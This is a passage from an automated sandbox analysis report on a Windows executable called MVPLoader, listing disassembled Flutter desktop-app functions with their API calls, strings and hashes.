                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605B4F43
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: Texture$DesktopExternalFlutterRegisterRegistrarV01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@
                                                  • String ID: $Attempting to register unknown texture variant.
                                                  • API String ID: 239970561-1905582426
                                                  • Opcode ID: bf5d2c287644e20a180a50225191efd9c2aa22ca14b639a8c48350afb347ee43
                                                  • Instruction ID: 4a1e21a2d6cec3f7da41af3820c9c51f430d6605779ab384ae69da97b0373748
                                                  • Opcode Fuzzy Hash: bf5d2c287644e20a180a50225191efd9c2aa22ca14b639a8c48350afb347ee43
                                                  • Instruction Fuzzy Hash: 9611D2B6D19B81C6EB20EB18E450A29B3A5FB84798FD01231E69C02756DF3CF564CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B658D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$#413Prop
                                                  • String ID: BitsDojoWindow
                                                  • API String ID: 1553527160-2907840716
                                                  • Opcode ID: ad7349f382d27030d0bd16a0785658698f89cf82e899d87a712ba028da5df37a
                                                  • Instruction ID: ca1186103be7adda2c9960067627cd90e5d3fbf8a3f637e0ac40c443521e9e52
                                                  • Opcode Fuzzy Hash: ad7349f382d27030d0bd16a0785658698f89cf82e899d87a712ba028da5df37a
                                                  • Instruction Fuzzy Hash: 69F05E19B08611C2F914AB6AB8206B9A6505F86FF1FD04235DD1A07BE7DF3CB5874B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B8B40 Relevance: 7.7, APIs: 5, Instructions: 161COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B8CAE
                                                    • Part of subcall function 00007FF7605BD450: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7605BD480
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B8C0E
                                                    • Part of subcall function 00007FF7605BD450: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7605B14A6), ref: 00007FF7605BD46A
                                                  • memset.VCRUNTIME140 ref: 00007FF7605B8C2B
                                                  • memmove.VCRUNTIME140 ref: 00007FF7605B8CD8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskmallocmemmovememset
                                                  • String ID:
                                                  • API String ID: 2876229200-0
                                                  • Opcode ID: 11419a21aab2b33d509510eeca921c8d4fb18a97e6358e74509ee06dc945f7da
                                                  • Instruction ID: 31be137e8019273511040c5bce40c1e7590944f5d0697930b1164e52c2b746b3
                                                  • Opcode Fuzzy Hash: 11419a21aab2b33d509510eeca921c8d4fb18a97e6358e74509ee06dc945f7da
                                                  • Instruction Fuzzy Hash: 8051E532A09B82C5EA54EB11E464AB9A650FB44BE0F985631DE6D077CADF7CF440C320
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B3900 Relevance: 7.6, APIs: 5, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memmove.VCRUNTIME140(?,?,00000000,?,00007FF7605B3BC4,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7605B3A14
                                                    • Part of subcall function 00007FF7605BD450: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7605B14A6), ref: 00007FF7605BD46A
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,00007FF7605B3BC4,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7605B3A87
                                                  • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140(?,?,?,?,?,?,?,?,00007FF7605B3BC4), ref: 00007FF7605B3AB5
                                                  • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140(?,?,?,?,?,?,?,?,00007FF7605B3BC4), ref: 00007FF7605B3AC1
                                                  • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,00007FF7605B3BC4), ref: 00007FF7605B3ACA
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: D@std@@@std@@U?$char_traits@$V12@$?flush@?$basic_ostream@?put@?$basic_ostream@?widen@?$basic_ios@_invalid_parameter_noinfo_noreturnmallocmemmove
                                                  • String ID:
                                                  • API String ID: 3447717424-0
                                                  • Opcode ID: 4ba63e3f9a8b516ddc4949d04df38554ad46262ec499eca850adab24e4e0bbfd
                                                  • Instruction ID: b63c53fce407da8a5df8c260d91c87c52c67646f68440a2b260cb3a8c50d97ea
                                                  • Opcode Fuzzy Hash: 4ba63e3f9a8b516ddc4949d04df38554ad46262ec499eca850adab24e4e0bbfd
                                                  • Instruction Fuzzy Hash: F041B022B04A86C2EA04EB26D4645BDA360EB08BE4F948635DAAD177D6DF7CF095C310
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B34C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF7605BD450: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7605B14A6), ref: 00007FF7605BD46A
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B357C
                                                  • FileSelectorWindowsRegisterWithRegistrar.FILE_SELECTOR_WINDOWS_PLUGIN ref: 00007FF7605B35FA
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B3635
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileRegisterRegistrarSelectorWindowsWithmalloc
                                                  • String ID: ugin
                                                  • API String ID: 1598008650-772329126
                                                  • Opcode ID: a3109c6b281ca9dc55887e694caa2dcee3b1e13e7b3718006fd36f1c05c90ea7
                                                  • Instruction ID: 9b2b30c493cd1cadfe2d371927c36162797eacdeb3abf9fd23ba1c9cae29d7ca
                                                  • Opcode Fuzzy Hash: a3109c6b281ca9dc55887e694caa2dcee3b1e13e7b3718006fd36f1c05c90ea7
                                                  • Instruction Fuzzy Hash: 59414172A18B86C2EB10AB24E45477AB761FB89794F405335EA9D07796DF7CF180C720
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B3FA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF7605BD450: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7605B14A6), ref: 00007FF7605BD46A
                                                  • FlutterDesktopViewControllerCreate.FLUTTER_WINDOWS(?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B4025
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B4051
                                                    • Part of subcall function 00007FF7605B3AE0: FlutterDesktopEngineCreate.FLUTTER_WINDOWS(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF7605B3FF9), ref: 00007FF7605B3BF7
                                                    • Part of subcall function 00007FF7605B3AE0: FlutterDesktopEngineGetMessenger.FLUTTER_WINDOWS(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF7605B3FF9), ref: 00007FF7605B3C04
                                                  • FlutterDesktopViewControllerGetView.FLUTTER_WINDOWS(?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B405C
                                                    • Part of subcall function 00007FF7605BD450: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7605BD480
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: DesktopFlutter$View$ControllerCreateEngineV01@$??6?$basic_ostream@Concurrency::cancel_current_taskD@std@@@std@@MessengerU?$char_traits@V01@@malloc
                                                  • String ID: Failed to create view controller.
                                                  • API String ID: 3120723180-4259721369
                                                  • Opcode ID: c2bb84ae38a9b5b7985ec0c74eb5d36c84e93b6e0d50bf12523a080d923f1f1c
                                                  • Instruction ID: 2dd4fe1f37eb603f413af6f74537cfb60b19f179f461c020bfad22fdc7a089bd
                                                  • Opcode Fuzzy Hash: c2bb84ae38a9b5b7985ec0c74eb5d36c84e93b6e0d50bf12523a080d923f1f1c
                                                  • Instruction Fuzzy Hash: 90315636A0AB46C2EB14EF19E464979B3A4EF84B80B944034CE4D17766EF3CF451C360
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B6B90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: #410HookUnhookWindows
                                                  • String ID: FLUTTERVIEW$FLUTTER_RUNNER_WIN32_WINDOW
                                                  • API String ID: 4047121361-705998389
                                                  • Opcode ID: 8eebcdb5be79951d0b9bcec0a71d53ce84da85b811ad765e74c6717ddfe96e48
                                                  • Instruction ID: 4a9eb259488916de370f2cefd81a10c965120e1d07523fdcf253546f6fb56049
                                                  • Opcode Fuzzy Hash: 8eebcdb5be79951d0b9bcec0a71d53ce84da85b811ad765e74c6717ddfe96e48
                                                  • Instruction Fuzzy Hash: B2218B62A08646C2EBA47B04D424BB9B7B1FB14B10FC48036D94D422A2DF7CBCD5C330
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B3370 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: AttributeValueWindow
                                                  • String ID: AppsUseLightTheme$Software\Microsoft\Windows\CurrentVersion\Themes\Personalize
                                                  • API String ID: 43761053-1432292134
                                                  • Opcode ID: 0348a5a9731dfe17a592f8df3c240b17dab287a70265fe9a818fb8ff0d2e919c
                                                  • Instruction ID: a30f6caa5d1a36cbc823f9cd6a6d2e887e4a6cf46456e2ded76c62b26943b018
                                                  • Opcode Fuzzy Hash: 0348a5a9731dfe17a592f8df3c240b17dab287a70265fe9a818fb8ff0d2e919c
                                                  • Instruction Fuzzy Hash: 8F016276608B81D6DB10DF64F49049ABBA0FB887D4F804236EA9903B69DF7CF148CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B41F0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: Xbad_function_call@std@@
                                                  • String ID:
                                                  • API String ID: 1029415015-0
                                                  • Opcode ID: 12147cb893190761d7a344a170387180c54fcc2aacb3e004e919e36fba84470b
                                                  • Instruction ID: 2a2004ff3340ee197f6b05ef3feaa63d7d51d72330c245e56d1d5cff7b7d6761
                                                  • Opcode Fuzzy Hash: 12147cb893190761d7a344a170387180c54fcc2aacb3e004e919e36fba84470b
                                                  • Instruction Fuzzy Hash: 41315E66619B46C2DE98AF96E0A067DA360FF84B84F542431EB4F07B45DF3CE4858B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B2BE0 Relevance: 6.1, APIs: 4, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000008,?,00000001,00000000,00007FF7605B2AED), ref: 00007FF7605B2C5A
                                                  • WideCharToMultiByte.KERNEL32 ref: 00007FF7605B2D26
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B2D78
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 1590159271-0
                                                  • Opcode ID: 7b51f9e27fa5d59f42b2982eb33cb05e7af63cd5e6b56843b9bbc45e2ffed472
                                                  • Instruction ID: 1359a7daa4f7651022073326b9219f56ff88b02e117d6fe43d6eba1602a7a4db
                                                  • Opcode Fuzzy Hash: 7b51f9e27fa5d59f42b2982eb33cb05e7af63cd5e6b56843b9bbc45e2ffed472
                                                  • Instruction Fuzzy Hash: 0651E322918B85C6E710AB25A41072AF790FB90BA4F508735EE9C07FDADF7CF4819760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B2780 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: memcpy$_invalid_parameter_noinfo_noreturnmemset
                                                  • String ID:
                                                  • API String ID: 594902525-0
                                                  • Opcode ID: b7171c04e1e9eedba86c61f938da79aeda4ef57e8e8d93f31a091d06f9a13713
                                                  • Instruction ID: 64b684c4ff1fc459d1d4a342078d8ef35b1b6121623a98c3f1083bc653f4222a
                                                  • Opcode Fuzzy Hash: b7171c04e1e9eedba86c61f938da79aeda4ef57e8e8d93f31a091d06f9a13713
                                                  • Instruction Fuzzy Hash: BE41B261B09781C1EE10AB12A5246AAE355FB48BD0F984631EE6D0B7DBDF7CF4418320
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B2A50 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7605B22DD), ref: 00007FF7605B2A80
                                                  • CommandLineToArgvW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7605B22DD), ref: 00007FF7605B2A8E
                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7605B22DD), ref: 00007FF7605B2B8F
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7605B22DD), ref: 00007FF7605B2BCE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: CommandLine$ArgvFreeLocal_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 1534275753-0
                                                  • Opcode ID: e833533add6cb6b7e01615f3858818efa2efe8bdc2799b8d88994c1e3767b0fb
                                                  • Instruction ID: 6b372ba3a9a5c4b8baa3c0f89c57c3e693e3d9c059458dadb7b078f576ccad64
                                                  • Opcode Fuzzy Hash: e833533add6cb6b7e01615f3858818efa2efe8bdc2799b8d88994c1e3767b0fb
                                                  • Instruction Fuzzy Hash: DF419032A18B41C2E710AF15E850A6AB7A0FB88B94F945231EF9D03756DF7CF590C760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B63B0 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: ClientZoomed$RectScreen
                                                  • String ID:
                                                  • API String ID: 783973183-0
                                                  • Opcode ID: 88952c9d4f3bcae45641665c6718b7e40c01a1767af4ccb0a0554668084abe15
                                                  • Instruction ID: 2691d1c165a68e7cc2662b1c4274773136e1e1d0462ed7ba230c1a8baaae0817
                                                  • Opcode Fuzzy Hash: 88952c9d4f3bcae45641665c6718b7e40c01a1767af4ccb0a0554668084abe15
                                                  • Instruction Fuzzy Hash: FD31AC25B1CB41C7EF24AB15E6E0A7DE391EB88784F900139D94E83756DF2CF5818B10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B32B0 Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: ClientFocusMoveParentRectWindow
                                                  • String ID:
                                                  • API String ID: 689593674-0
                                                  • Opcode ID: b2f7973599cd2cacdf69d0440f01dad953939c18b4572d75372237580b9251db
                                                  • Instruction ID: 62bd5c34769909f7b99ec5f2aa0e79eba3c657de6312c18a2d8ab1470095dc63
                                                  • Opcode Fuzzy Hash: b2f7973599cd2cacdf69d0440f01dad953939c18b4572d75372237580b9251db
                                                  • Instruction Fuzzy Hash: B4012D7A618A41C7DB14DF29F85482AB370FB88B84B501131EA5E43B29DF3CF4518B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B73F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 174COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF7605BD450: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7605B14A6), ref: 00007FF7605BD46A
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605B754C
                                                    • Part of subcall function 00007FF7605BD450: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7605BD480
                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 00007FF7605B75F8
                                                  Strings
